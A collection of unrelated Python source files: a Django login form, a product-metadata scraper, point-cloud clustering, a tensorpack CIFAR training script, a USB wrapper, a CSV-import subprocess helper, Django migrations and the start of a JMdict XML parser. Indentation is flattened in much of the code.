from django import forms
from django.contrib.auth.forms import AuthenticationForm
# from django.contrib.auth.models import User
class UserLoginForm(AuthenticationForm):
pass
# def confirm_login_allowed(self, user):
# if not user.is_active or not user.is_validated:
# raise forms.ValidationError(
# 'There was a problem with your login.',
# code='invalid_login'
# )
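# A hedged sketch of how this form could be wired into Django's built-in
# LoginView (the URL path and name below are assumptions for illustration):
#
# from django.contrib.auth import views as auth_views
# from django.urls import path
#
# urlpatterns = [
#     path("login/", auth_views.LoginView.as_view(authentication_form=UserLoginForm), name="login"),
# ]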
|
from .dlca import DynamicLCATestCase
from .ia import DynamicIATestCase
from .td import TemporalDistributionTestCase
|
from lxml import etree
import datetime
import json
from wordfilter import censored_words
import javmovie
BASEURL="https://www.r18.com/api/v4f/contents/[id]?lang=en&unit=USD"
SEARCH_URL = "https://www.r18.com/common/search/searchword="
xpath_searchresults = "/html/body/div[6]/div/div[2]/section/ul[2]"
RESULT_LIMIT = 10
def get_by_content_id(content_id):
    # JSON.ObjectFromURL is a global supplied by the Plex plugin framework,
    # not the standard-library json module imported above.
try:
json_response = JSON.ObjectFromURL(
BASEURL.replace("[id]", content_id),
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
}
)
except Exception as e:
return None
if json_response["status"] != "OK":
return None
args = {}
args["content_id"] = content_id
args["jav_code"] = json_response["data"]["dvd_id"]
title = json_response["data"]["title"].lower()
for word, replacement in censored_words.items():
title = title.replace(word.lower(), replacement)
args["title"] = title.title().strip()
tags = []
if json_response["data"]["categories"] is not None:
for tag in json_response["data"]["categories"]:
tagtemp = tag["name"]
to_remove = ["Featured Actress", "Hi-Def", "2021 Winter Sale", "Sale (limited time)", "Digital Mosaic", "AV OPEN 2017 Y********l Category"]
if tagtemp in to_remove:
continue
for word, replacement in censored_words.items():
tagtemp = tagtemp.lower().replace(word.lower(), replacement)
tags.append(tagtemp.title())
args["tags"] = tags
if json_response["data"]["maker"] is not None and json_response["data"]["maker"]["name"] is not None:
args["studio_label"] = json_response["data"]["maker"]["name"]
else:
args["studio_label"] = None
date = json_response["data"]["release_date"]
if date is None:
args["release_date"] = None
else:
args["release_date"] = datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S")
args["image_url"] = json_response["data"]["images"]["jacket_image"]["large"]
return javmovie.JAVMovie(args)
def __str__(self):
    return "<R18Movie " + self.jav_code + ">"
def get_search_results(keyword):
    # HTTP.Request is a global supplied by the Plex plugin framework.
    html = HTTP.Request(SEARCH_URL + keyword + "/").content
tree = etree.HTML(html)
result_elements = tree.xpath(xpath_searchresults)
if len(result_elements) == 0:
return []
result_urls = result_elements[0]
if len(result_urls) == 0:
return []
results_checked = 0
results = []
    for result in result_urls:
        mov_result = get_by_content_id(result[0].attrib["href"].split("id=")[1].replace("/", ""))
        # get_by_content_id returns None on failure; skip those.
        if mov_result is not None:
            results.append(mov_result)
        results_checked += 1
        if results_checked >= RESULT_LIMIT:
            break
return results
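# Hedged usage sketch (this module runs inside the Plex plugin framework,
# which supplies the JSON and HTTP globals used above):
#
# movie = get_by_content_id("abc00123")    # hypothetical content id
# results = get_search_results("keyword")  # up to RESULT_LIMIT JAVMovie objects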
|
import numpy as np
import pandas as pd
from collections import Counter
from statistics import mode, StatisticsError
import warnings
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.cluster import DBSCAN
import hdbscan
def centroid_3d(arr):
"""Calculate the centroid of a set of points"""
length = arr.shape[0]
sum_x = np.sum(arr[:, 0])
sum_y = np.sum(arr[:, 1])
sum_z = np.sum(arr[:, 2])
return sum_x / length, sum_y / length, sum_z / length
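# For example:
# >>> centroid_3d(np.array([[0., 0., 0.], [2., 4., 6.]]))
# (1.0, 2.0, 3.0)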
def show_images_and_points(
images, points, cluster_classes, class_names=None, titles=None, figsize=(12, 4)
):
n_ims = len(images)
if titles is None:
titles = ["(%d)" % i for i in range(1, n_ims + 1)]
fig = plt.figure(figsize=figsize)
n = 1
plt.style.use("ggplot")
if class_names is None:
class_names = [str(i) for i in cluster_classes]
for image, title in zip(images, titles):
a = fig.add_subplot(1, n_ims, n)
plt.imshow(image, cmap="gray")
scat = a.scatter(
points[:, 1], points[:, 2], c=cluster_classes, cmap="jet_r", s=50, alpha=1.0
)
a.legend(handles=scat.legend_elements()[0], labels=class_names)
a.set_title(title)
n += 1
def rescale_3d(X, x_scale, y_scale, z_scale):
"""Scale an array of points by given x,y and z scale"""
X_rescaled = np.zeros_like(X)
X_rescaled[:, 0] = X[:, 0] * x_scale
X_rescaled[:, 1] = X[:, 1] * y_scale
X_rescaled[:, 2] = X[:, 2] * z_scale
return X_rescaled
def aggregation(
orig_pts,
chip,
offset_x,
offset_y,
min_cluster_size=5,
min_samples=1,
eps=5,
method="hdbscan",
plot_all=False,
debug_verbose=False,
quantile_threshold=0.95,
):
"""Cluster and simplify point cloud data.
Args:
orig_pts (np.ndarray): array of 3d points
chip (np.ndarray): chip volume
offset_x (int): x offset in original volume
offset_y (int): y offset in original volume
min_cluster_size (int, optional): minimum number of points in a cluster. Defaults to 5.
method (str, optional): cluster method. Defaults to 'hdbscan'.
plot_all (bool, optional): debug plotting. Defaults to False.
debug_verbose (bool, optional): debug messages. Defaults to False.
Returns:
np.ndarray, np.ndarray: cluster centroids, cluster classes
"""
X = orig_pts.copy()
img_sample = chip[chip.shape[0] // 2, :]
subsample = False
print(f"Image {chip.shape}")
print(f"Clustering pts {orig_pts.shape}")
if plot_all:
plt.figure(figsize=(14, 14))
plt.gca().invert_yaxis()
plt.scatter(
orig_pts[:, 1] - offset_x,
orig_pts[:, 2] - offset_y,
s=5,
linewidth=0,
c=orig_pts[:, 3],
alpha=1.0,
)
plt.title("Raw Points Before")
if subsample:
X = np.array(X)
samp_prop = 0.3
num_samp = int(samp_prop * len(X))
X = np.floor(np.random.permutation(X))[0:num_samp, :]
scale_minmax = False
if scale_minmax:
scale_x = 1.0 / np.max(X[:, 0])
scale_y = 1.0 / np.max(X[:, 1])
scale_z = 1.0 / np.max(X[:, 2])
if debug_verbose:
print("Scaling by {} {} {}".format(scale_x, scale_y, scale_z))
        # The crop extents (xstart/xend, ystart/yend, vol_shape_z) are not
        # available in this scope, so scale by the min-max factors above.
        X_rescaled = rescale_3d(X, scale_x, scale_y, scale_z)
else:
X_rescaled = X.copy()
if scale_minmax:
xlim = (
np.min(X_rescaled[:, 1]).astype(np.uint16) - 0.1,
np.max(X_rescaled[:, 1]).astype(np.uint16) + 0.1,
)
ylim = (
np.min(X_rescaled[:, 2]).astype(np.uint16) - 0.1,
np.max(X_rescaled[:, 2]).astype(np.uint16) + 0.1,
)
zlim = (
np.min(X_rescaled[:, 0]).astype(np.uint16) - 0.1,
np.max(X_rescaled[:, 0]).astype(np.uint16) + 0.1,
)
else:
xlim = (0, chip.shape[1])
ylim = (0, chip.shape[2])
zlim = (0, chip.shape[0])
#
# Point cloud cluster
#
if method == "hdbscan":
        clusterer = hdbscan.HDBSCAN(
            min_cluster_size=min_cluster_size, min_samples=min_samples
        ).fit(X_rescaled)
label_code = clusterer.labels_
num_clusters_found = len(np.unique(label_code))
threshold = pd.Series(clusterer.outlier_scores_).quantile(quantile_threshold)
outliers = np.where(clusterer.outlier_scores_ > threshold)[0]
X_rescaled_cl = np.delete(X_rescaled, outliers, axis=0)
label_code_cl = np.delete(label_code, outliers, axis=0)
cluster_probs_cl = np.delete(clusterer.probabilities_, outliers, axis=0)
num_outliers_removed = X_rescaled.shape[0] - X_rescaled_cl.shape[0]
if debug_verbose:
print("Limits: {} {} {} ".format(xlim, ylim, zlim))
print(np.min(X[:, 0]), np.min(X[:, 1]), np.min(X[:, 2]))
print(
"Orig: {} Clean: {} Num points rem: {}".format(
X_rescaled.shape[0], X_rescaled_cl.shape[0], num_outliers_removed
)
)
print(
"Proportion removed: {}".format(
num_outliers_removed / X_rescaled.shape[0]
)
)
elif method == "dbscan":
clusterer = DBSCAN(eps=eps, min_samples=min_samples).fit(X_rescaled)
label_code_cl = clusterer.labels_
X_rescaled_cl = X_rescaled[label_code_cl != -1]
num_clusters_found = len(np.unique(label_code_cl))
    # Clusters have different sizes, so keep them in a plain list rather than
    # forcing a ragged ndarray.
    cluster_coords = [
        X_rescaled_cl[label_code_cl == l] for l in np.unique(label_code_cl)
    ]
    cluster_sizes = np.array([len(cluster_coord) for cluster_coord in cluster_coords])
print(f"Cluster sizes {cluster_sizes.shape}")
cluster_centroids = np.array(
[centroid_3d(cluster_coord) for cluster_coord in cluster_coords]
)
title_str = "Number of original clicks: {0} Number of final centroids: {1} Av clicks cluster {2}".format(
X_rescaled.shape[0],
cluster_sizes.shape[0],
X_rescaled.shape[0] / cluster_sizes.shape[0],
)
slice_center = int(chip.shape[0] / 2.0)
cc2 = np.roll(cluster_centroids, shift=2, axis=1)
slice_top, slice_bottom = slice_center + 5, slice_center - 5
centroid_coords_woffset = cc2.copy()
centroid_coords_woffset[:, 1] = centroid_coords_woffset[:, 1] - offset_y
centroid_coords_woffset[:, 0] = centroid_coords_woffset[:, 0] - offset_x
cc = []
for c in cluster_coords:
cluster_classes = list(c[:, 3].astype(np.uint32))
try:
classes_mode = mode(cluster_classes)
except StatisticsError as e:
classes_mode = np.random.choice(cluster_classes)
cc.append(classes_mode)
# print(f"Assigned class for cluster: {classes_mode}")
if debug_verbose:
print(f"Number of clusters: {len(cluster_coords)}")
# print(f"Cluster classes {cc}")
print(f"Len cluster classes {len(cc)}")
clustered = np.zeros((cluster_centroids.shape[0], 4))
clustered[:, 0:3] = cluster_centroids
clustered[:, 3] = cc
if plot_all:
plt.figure(figsize=(14, 14))
plt.gca().invert_yaxis()
        plt.scatter(
            # Offsets were already subtracted when building centroid_coords_woffset.
            centroid_coords_woffset[:, 0],
            centroid_coords_woffset[:, 1],
            s=5,
            linewidth=0,
            c=cc,
            alpha=1.0,
        )
plt.title("Raw Points After")
show_images_and_points(
[
img_sample,
],
cluster_centroids,
cc,
figsize=(12, 12),
)
print(f"Produced clustered output of shape: {clustered.shape}")
return clustered
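# A minimal usage sketch with synthetic data; the shapes and column layout
# (z, x, y, class) are assumptions inferred from the code above:
#
# rng = np.random.default_rng(0)
# pts = np.column_stack([
#     rng.integers(0, 32, 500),  # z (slice index)
#     rng.integers(0, 64, 500),  # x
#     rng.integers(0, 64, 500),  # y
#     rng.integers(0, 3, 500),   # class label
# ]).astype(float)
# chip = np.zeros((32, 64, 64))
# clustered = aggregation(pts, chip, offset_x=0, offset_y=0, method="dbscan")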
|
import numpy as np
import argparse
import os, sys, datetime
import tensorflow as tf
from tensorpack import *
from tensorpack.tfutils.symbolic_functions import *
from tensorpack.tfutils.summary import *
from tensorpack.utils import anytime_loss, logger, utils, fs
from tensorpack.callbacks import Exp3CPU, RWMCPU, FixedDistributionCPU, ThompsonSamplingCPU
from tensorflow.contrib.layers import variance_scaling_initializer
"""
"""
MODEL_DIR=None
# Whether use validation set:
DO_VALID=False
# Network structure
BATCH_SIZE = 128
NUM_RES_BLOCKS = 3
NUM_UNITS = 5
WIDTH = 1
INIT_CHANNEL = 16
NUM_CLASSES=10
# anytime loss skip (num units per stack/prediction)
NUM_UNITS_PER_STACK=1
# Random loss sample params
# 0: none; 1: uniform random; 2: Exp3; 3: fixed distribution;
# 4: RWM; 5: Thompson sampling; 6: fixed distribution from the loss weights
SAMLOSS=0
EXP3_GAMMA=0.5
SUM_RAND_RATIO=2.0
LAST_REWARD_RATE=0.85
# Stop gradients params
STOP_GRADIENTS=False
STOP_GRADIENTS_PARTIAL=False
SG_GAMMA = 0.3
TRACK_GRADIENTS=False
# For other loss weight assignments
FUNC_TYPE=5
OPTIMAL_AT=-1
EXP_BASE=2.0
def loss_weights(N):
if FUNC_TYPE == 0: # exponential spacing
return anytime_loss.at_func(N, func=lambda x:2**x)
elif FUNC_TYPE == 1: # square spacing
return anytime_loss.at_func(N, func=lambda x:x**2)
elif FUNC_TYPE == 2: #optimal at ?
return anytime_loss.optimal_at(N, OPTIMAL_AT)
elif FUNC_TYPE == 3: #exponential weights
return anytime_loss.exponential_weights(N, base=EXP_BASE)
elif FUNC_TYPE == 4: #constant weights
return anytime_loss.constant_weights(N)
elif FUNC_TYPE == 5: # sieve with stack
return anytime_loss.stack_loss_weights(N, NUM_UNITS_PER_STACK)
elif FUNC_TYPE == 6: # linear
return anytime_loss.linear(N, a=0.25, b=1.0)
elif FUNC_TYPE == 7: # half constant, half optimal at -1
return anytime_loss.half_constant_half_optimal(N, -1)
    elif FUNC_TYPE == 8: # quarter constant, half optimal
return anytime_loss.quater_constant_half_optimal(N)
elif FUNC_TYPE == 9:
return anytime_loss.stack_loss_weights(N, NUM_UNITS_PER_STACK, anytime_loss.eann_sieve)
    else:
        raise NameError('func type must be one of 0-9 (e.g., 0: exponential spacing, '
            '1: square spacing, 2: optimal at --opt_at, 3: exponential weights '
            'with base --base); see loss_weights for the full mapping')
class Model(ModelDesc):
def __init__(self, n, width, init_channel, num_classes, weights):
super(Model, self).__init__()
self.n = n
self.width = width
self.init_channel = init_channel
self.num_classes = num_classes
self.weights = weights
def _get_inputs(self):
return [InputDesc(tf.float32, [None, 32, 32, 3], 'input'),
InputDesc(tf.int32, [None], 'label')]
def _build_graph(self, inputs):
image, label = inputs
image = image / 128.0
image = tf.transpose(image, [0,3,1,2])
def conv(name, l, channel, stride):
kernel = 3
stddev = np.sqrt(2.0/kernel/kernel/channel)
return Conv2D(name, l, channel, kernel, stride=stride,
nl=tf.identity, use_bias=False,
W_init=variance_scaling_initializer(mode='FAN_OUT'))
def residual(name, l_feats, increase_dim=False):
shape = l_feats[0].get_shape().as_list()
in_channel = shape[1]
if increase_dim:
out_channel = in_channel * 2
stride1 = 2
else:
out_channel = in_channel
stride1 = 1
l_mid_feats = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.mid') as scope:
l = BatchNorm('bn0', l_feats[w])
                    # The first round doesn't use relu, per pyramidal deep nets
# l = tf.nn.relu(l)
if w == 0:
merged_feats = l
else:
merged_feats = tf.concat([merged_feats, l], 1, name='concat_mf')
l = conv('conv1', merged_feats, out_channel, stride1)
l = BatchNorm('bn1', l)
l = tf.nn.relu(l)
l_mid_feats.append(l)
l_end_feats = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.end') as scope:
l = l_mid_feats[w]
if w == 0:
merged_feats = l
else:
merged_feats = tf.concat([merged_feats, l], 1, name='concat_ef')
ef = conv('conv2', merged_feats, out_channel, 1)
                    # The second conv needs BN before the addition.
ef = BatchNorm('bn2', ef)
l = l_feats[w]
if increase_dim:
l = AvgPooling('pool', l, 2)
l = tf.pad(l, [[0,0], [in_channel//2, in_channel//2], [0,0], [0,0]])
ef += l
l_end_feats.append(ef)
return l_end_feats
def row_sum_predict(name, l_feats, out_dim):
l_logits = []
var_list = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.predict') as scope:
l = tf.nn.relu(l_feats[w])
l = GlobalAvgPooling('gap', l)
if w == 0:
merged_feats = l
else:
merged_feats = tf.concat([merged_feats, l], 1, name='concat')
logits = FullyConnected('linear', merged_feats, out_dim, \
nl=tf.identity)
var_list.append(logits.variables.W)
var_list.append(logits.variables.b)
#if w != 0:
# logits += l_logits[-1]
l_logits.append(logits)
return l_logits, var_list
def cost_and_eval(name, l_logits, label):
l_costs = []
l_wrong = []
for w in range(self.width):
with tf.variable_scope(name+'.'+str(w)+'.eval') as scope:
logits = l_logits[w]
cost = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=label)
cost = tf.reduce_mean(cost, name='cross_entropy_loss')
add_moving_summary(cost)
wrong = prediction_incorrect(logits, label)
wrong = tf.reduce_mean(wrong, name='train_error')
add_moving_summary(wrong)
l_costs.append(cost)
l_wrong.append(wrong)
return l_costs, l_wrong
logger.info("sampling loss with method {}".format(SAMLOSS))
if SAMLOSS > 0:
ls_K = np.sum(np.asarray(self.weights) > 0)
select_idx = tf.get_variable("select_idx", (), tf.int32,
initializer=tf.constant_initializer(ls_K - 1), trainable=False)
for i in range(ls_K):
weight_i = tf.cast(tf.equal(select_idx, i), tf.float32, name='weight_{}'.format(i))
add_moving_summary(weight_i)
with argscope([Conv2D, AvgPooling, BatchNorm, GlobalAvgPooling], data_format='NCHW'):
l_feats = []
for w in range(self.width):
with tf.variable_scope('init_conv'+str(w)) as scope:
l = conv('conv0', image, self.init_channel, 1)
#l = BatchNorm('bn0', l)
#l = tf.nn.relu(l)
l_feats.append(l)
wd_w = tf.train.exponential_decay(0.0002, get_global_step_var(),
480000, 0.2, True)
wd_cost = 0
cost = 0
unit_idx = -1
anytime_idx = -1
online_learn_rewards = []
last_cost = None
max_reward = 0.0
for res_block_i in range(NUM_RES_BLOCKS):
for k in range(self.n):
scope_name = 'res{}.{:02d}'.format(res_block_i, k)
l_feats = \
residual(scope_name, l_feats,
increase_dim=(k==0 and res_block_i > 0))
l_logits, var_list = row_sum_predict(scope_name, l_feats, self.num_classes)
l_costs, l_wrong = cost_and_eval(scope_name, l_logits, label)
is_last_row = res_block_i == NUM_RES_BLOCKS-1 and k==self.n-1
for ci, c in enumerate(l_costs):
unit_idx += 1
cost_weight = self.weights[unit_idx]
if cost_weight > 0:
anytime_idx += 1
add_weight = 0
if SAMLOSS > 0:
add_weight = tf.cond(tf.equal(anytime_idx, select_idx),
lambda: tf.constant(self.weights[-1] * 2.0, dtype=tf.float32),
lambda: tf.constant(0, dtype=tf.float32))
if SUM_RAND_RATIO > 0:
cost += (cost_weight + add_weight / SUM_RAND_RATIO) * c
else:
cost += add_weight * c
# Regularize weights from FC layers. Should use
# regularize_cost to get the weights using variable names
wd_cost += cost_weight * wd_w * tf.nn.l2_loss(var_list[2*ci])
#gs = tf.gradients(c, tf.trainable_variables())
#reward = tf.add_n([tf.nn.l2_loss(g) for g in gs if g is not None])
                        if last_cost is not None:
reward = 1.0 - c / last_cost
max_reward = tf.maximum(reward, max_reward)
online_learn_rewards.append(tf.multiply(reward, 1.0,
name='reward_{:02d}'.format(anytime_idx-1)))
if ci == len(l_costs)-1 and is_last_row:
reward = max_reward * LAST_REWARD_RATE
online_learn_rewards.append(tf.multiply(reward, 1.0,
name='reward_{:02d}'.format(anytime_idx)))
#cost = tf.Print(cost, online_learn_rewards)
last_cost = c
if STOP_GRADIENTS_PARTIAL and not is_last_row:
l = l_feats[ci]
l = (1 - SG_GAMMA) * tf.stop_gradient(l) + SG_GAMMA * l
l_feats[ci] = l
#endif cost_weight > 0
#endfor each width
#endfor each n
# endfor each block
# weight decay on all W on conv layers
wd_cost = tf.add(wd_cost, wd_w * regularize_cost('.*conv.*/W', tf.nn.l2_loss), \
name='wd_cost')
add_moving_summary(cost, wd_cost)
add_param_summary(('.*/W', ['histogram'])) # monitor W
self.cost = tf.add_n([cost, wd_cost], name='cost')
def _get_optimizer(self):
lr = get_scalar_var('learning_rate', 0.01, summary=True)
opt = tf.train.MomentumOptimizer(lr, 0.9)
return opt
def get_data(train_or_test):
isTrain = train_or_test == 'train'
if NUM_CLASSES == 10:
ds = dataset.Cifar10(train_or_test, do_validation=DO_VALID)
elif NUM_CLASSES == 100:
ds = dataset.Cifar100(train_or_test, do_validation=DO_VALID)
    else:
        raise ValueError('Number of classes must be 10 (default) or 100 for CIFAR')
    if DO_VALID:
        print('{} {}'.format(isTrain, len(ds.data)))
pp_mean = ds.get_per_pixel_mean()
if isTrain:
augmentors = [
imgaug.CenterPaste((40, 40)),
imgaug.RandomCrop((32, 32)),
imgaug.Flip(horiz=True),
imgaug.MapImage(lambda x: x - pp_mean),
]
else:
augmentors = [
imgaug.MapImage(lambda x: x - pp_mean)
]
ds = AugmentImageComponent(ds, augmentors)
ds = BatchData(ds, BATCH_SIZE, remainder=not isTrain)
if isTrain:
ds = PrefetchData(ds, 3, 2)
return ds
def get_config():
# prepare dataset
dataset_train = get_data('train')
steps_per_epoch = dataset_train.size()
dataset_test = get_data('test')
vcs = []
total_units = NUM_RES_BLOCKS * NUM_UNITS * WIDTH
weights = loss_weights(total_units)
unit_idx = -1
for bi in range(NUM_RES_BLOCKS):
for ui in range(NUM_UNITS):
for wi in range(WIDTH):
unit_idx += 1
weight = weights[unit_idx]
if weight > 0:
scope_name = 'res{}.{:02d}.{}.eval/'.format(bi, ui, wi)
vcs.append(ClassificationError(\
wrong_tensor_name=scope_name+'incorrect_vector:0',
summary_name=scope_name+'val_err'))
if SAMLOSS > 0:
ls_K = np.sum(np.asarray(weights) > 0)
reward_names = [ 'tower0/reward_{:02d}:0'.format(i) for i in range(ls_K)]
if SAMLOSS == 3:
online_learn_cb = FixedDistributionCPU(ls_K, 'select_idx:0', None)
elif SAMLOSS == 6:
online_learn_cb = FixedDistributionCPU(ls_K, 'select_idx:0',
weights[weights>0])
else:
gamma = EXP3_GAMMA
if SAMLOSS == 1:
online_learn_func = Exp3CPU
gamma = 1.0
elif SAMLOSS == 2:
online_learn_func = Exp3CPU
elif SAMLOSS == 4:
online_learn_func = RWMCPU
elif SAMLOSS == 5:
online_learn_func = ThompsonSamplingCPU
online_learn_cb = online_learn_func(ls_K, gamma,
'select_idx:0', reward_names)
online_learn_cb = [ online_learn_cb ]
else:
online_learn_cb = []
logger.info('weights: {}'.format(weights))
#if SAMLOSS > 0:
# lr_schedule = [(1, 0.1), (82, 0.02), (123, 0.004), (250, 0.0008)]
#else:
lr_schedule = [(1, 0.1), (82, 0.01), (123, 0.001), (250, 0.0002)]
return TrainConfig(
dataflow=dataset_train,
callbacks=[
ModelSaver(checkpoint_dir=MODEL_DIR),
InferenceRunner(dataset_test,
[ScalarStats('cost')] + vcs),
ScheduledHyperParamSetter('learning_rate', lr_schedule)
] + online_learn_cb,
model=Model(NUM_UNITS,WIDTH,INIT_CHANNEL,NUM_CLASSES,weights),
steps_per_epoch=steps_per_epoch,
max_epoch=300,
)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--log_dir', help='log_dir position',
type=str, default=None)
parser.add_argument('--data_dir', help='data_dir position',
type=str, default=None)
parser.add_argument('--model_dir', help='model_dir position',
type=str, default=None)
parser.add_argument('--batch_size', help='Batch size for train/testing',
type=int, default=BATCH_SIZE)
parser.add_argument('-n', '--num_units',
help='number of units in each stage',
type=int, default=NUM_UNITS)
parser.add_argument('-w', '--width',
help='width of the network',
type=int, default=WIDTH)
parser.add_argument('-c', '--init_channel',
help='channel at beginning of each width of the network',
type=int, default=INIT_CHANNEL)
parser.add_argument('-s', '--stack',
help='number of units per stack, \
i.e., number of units per prediction',
type=int, default=NUM_UNITS_PER_STACK)
parser.add_argument('--num_classes', help='Number of classes',
type=int, default=NUM_CLASSES)
    # argparse's type=bool treats any non-empty string as True, so boolean
    # options are exposed as store_true flags.
    parser.add_argument('--stopgrad', help='Whether to stop gradients.',
                        action='store_true', default=STOP_GRADIENTS)
    parser.add_argument('--stopgradpartial', help='Whether to stop gradients for other width.',
                        action='store_true', default=STOP_GRADIENTS_PARTIAL)
parser.add_argument('--sg_gamma', help='Gamma for partial stop_gradient',
type=np.float32, default=SG_GAMMA)
parser.add_argument('--samloss', help='Method to Sample losses to update',
type=int, default=SAMLOSS)
parser.add_argument('--exp_gamma', help='Gamma for exp3 in sample loss',
type=np.float32, default=EXP3_GAMMA)
parser.add_argument('--sum_rand_ratio', help='frac{Sum weight}{randomly selected weight}',
type=np.float32, default=SUM_RAND_RATIO)
parser.add_argument('--last_reward_rate', help='rate of last reward in comparison to the max',
type=np.float32, default=LAST_REWARD_RATE)
    parser.add_argument('--track_grads', help='Whether to track gradient l2 of each loss',
                        action='store_true', default=TRACK_GRADIENTS)
    parser.add_argument('--do_validation', help='Whether to use the validation set. Off by default.',
                        action='store_true', default=DO_VALID)
parser.add_argument('-f', '--func_type',
help='Type of non-linear spacing to use: 0 for exp, 1 for sqr',
type=int, default=FUNC_TYPE)
parser.add_argument('--base', help='Exponential base',
type=np.float32, default=EXP_BASE)
parser.add_argument('--opt_at', help='Optimal at',
type=int, default=OPTIMAL_AT)
parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')
parser.add_argument('--load', help='load model')
args = parser.parse_args()
FUNC_TYPE = args.func_type
BATCH_SIZE = args.batch_size
NUM_UNITS = args.num_units
WIDTH = args.width
INIT_CHANNEL = args.init_channel
NUM_UNITS_PER_STACK = args.stack
NUM_CLASSES = args.num_classes
STOP_GRADIENTS = args.stopgrad
STOP_GRADIENTS_PARTIAL = args.stopgradpartial
SG_GAMMA = args.sg_gamma
SAMLOSS = args.samloss
EXP3_GAMMA = args.exp_gamma
SUM_RAND_RATIO = args.sum_rand_ratio
LAST_REWARD_RATE = args.last_reward_rate
TRACK_GRADIENTS = args.track_grads
DO_VALID = args.do_validation
EXP_BASE = args.base
OPTIMAL_AT = args.opt_at
print("TF version: {}".format(tf.__version__))
if STOP_GRADIENTS:
STOP_GRADIENTS_PARTIAL = True
SG_GAMMA = 0.0
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
logger.set_log_root(log_root=args.log_dir)
logger.auto_set_dir()
fs.set_dataset_path(path=args.data_dir, auto_download=False)
MODEL_DIR = args.model_dir
logger.info("On Dataset CIFAR{}, Parameters: f= {}, n= {}, w= {}, c= {}, s= {}, batch_size= {}, stopgrad= {}, stopgradpartial= {}, sg_gamma= {}, rand_loss_selector= {}, exp_gamma= {}, sum_rand_ratio= {} do_validation= {} exp_base= {} opt_at= {}".format(\
NUM_CLASSES, FUNC_TYPE, NUM_UNITS, WIDTH, INIT_CHANNEL, \
NUM_UNITS_PER_STACK, BATCH_SIZE, STOP_GRADIENTS, \
STOP_GRADIENTS_PARTIAL, SG_GAMMA, \
args.samloss, EXP3_GAMMA, SUM_RAND_RATIO, DO_VALID, \
EXP_BASE, OPTIMAL_AT))
config = get_config()
if args.load:
config.session_init = SaverRestore(args.load)
if args.gpu:
config.nr_tower = len(args.gpu.split(','))
SyncMultiGPUTrainer(config).train()
|
# -*- coding: utf-8 -*-
import usb.core
class USBDevice(object):
def __init__(self, device):
self.device = device
self.device.default_timeout = 1000
self.device.set_configuration()
def __del__(self):
usb.util.dispose_resources(self.device)
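if __name__ == "__main__":
    # Hedged usage sketch; the vendor/product IDs below are placeholders.
    dev = usb.core.find(idVendor=0x1234, idProduct=0x5678)
    if dev is not None:
        device = USBDevice(dev)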
|
from os.path import join
import os
from loan import constants
import subprocess
def csv_log_process(form_name, manage_command_name):
"""
This function is executing the process of adding the uploaded csv data to
the database and logging the errors (if any) in log files.
"""
task = form_name.save(commit=False)
task.status = constants.TASK_STATUS_YET_TO_START
task.save()
log_dir = join(os.getcwd(), "csvlogs")
if not os.path.exists(log_dir):
os.mkdir(log_dir)
log_file = open(join(log_dir, "csv.log"), "a+")
error_log_file = open(join(log_dir, "csverror.log"), "a+")
manage_py_location = join(os.getcwd(), "manage.py")
python_path = join(os.getcwd(), ".heroku", "python", "bin", "python")
command_run_args = [
python_path,
manage_py_location,
manage_command_name,
]
args = [
str(task.id),
]
subprocess.Popen(
command_run_args + args,
env=os.environ.copy(),
stdout=log_file,
stderr=error_log_file,
)
return task.id
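# A hedged usage sketch (inside a Django view; the form and management-command
# name below are placeholders):
#
# task_id = csv_log_process(upload_form, "process_loan_csv")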
|
# Generated by Django 3.1.2 on 2020-10-17 10:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Product', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('categoryid', models.CharField(max_length=200, unique=True)),
('category_name', models.CharField(max_length=50, unique=True)),
('date_posted', models.DateField()),
],
),
migrations.RemoveField(
model_name='product',
name='categories',
),
migrations.AddField(
model_name='product',
name='id',
field=models.AutoField(auto_created=True, default=1, primary_key=True, serialize=False, verbose_name='ID'),
preserve_default=False,
),
migrations.AlterField(
model_name='product',
name='productid',
field=models.CharField(max_length=200, unique=True),
),
migrations.AddField(
model_name='product',
name='category',
field=models.ManyToManyField(to='Product.Category'),
),
]
|
# Generated by Django 2.2.3 on 2019-07-19 12:33
import django.contrib.postgres.fields.jsonb
from django.db import migrations
import polygon.core.utils.json_serializer
class Migration(migrations.Migration):
dependencies = [("product", "0097_auto_20190719_0458")]
operations = [
migrations.AlterField(
model_name="product",
name="meta",
field=django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
migrations.AlterField(
model_name="producttype",
name="meta",
field=django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=polygon.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
]
|
from typing import BinaryIO, Dict, Generator, List, Tuple, Union
from lxml import etree # type: ignore
from botto.core.models.jmdict import (
Entry,
WritingElement,
ReadingElement,
Sense,
Gloss,
LSource,
ReadingWriting,
ReadingSense,
WritingSense,
)
XMLNS: str = "{http://www.w3.org/XML/1998/namespace}"
def _get_child(node: etree._Element, tag: str) -> etree._Element:
return next(node.iter(tag))
def _has_child(node: etree._Element, tag: str) -> bool:
try:
_get_child(node, tag)
except StopIteration:
return False
return True
def _parse_node(entry_node: etree._Element) -> Tuple[Entry, dict]:
entry_id: int = int(_get_child(entry_node, "ent_seq").text)
    # All model instances
entry: Entry = Entry(id=entry_id)
writing_elements: List[WritingElement] = []
reading_elements: List[ReadingElement] = []
reading_writings_mapping: Dict[ReadingElement, List[WritingElement]] = {}
readings_writings: List[ReadingWriting] = []
senses: List[Sense] = []
lsources: List[LSource] = []
glosses: List[Gloss] = []
writings_senses: List[WritingSense] = []
readings_senses: List[ReadingSense] = []
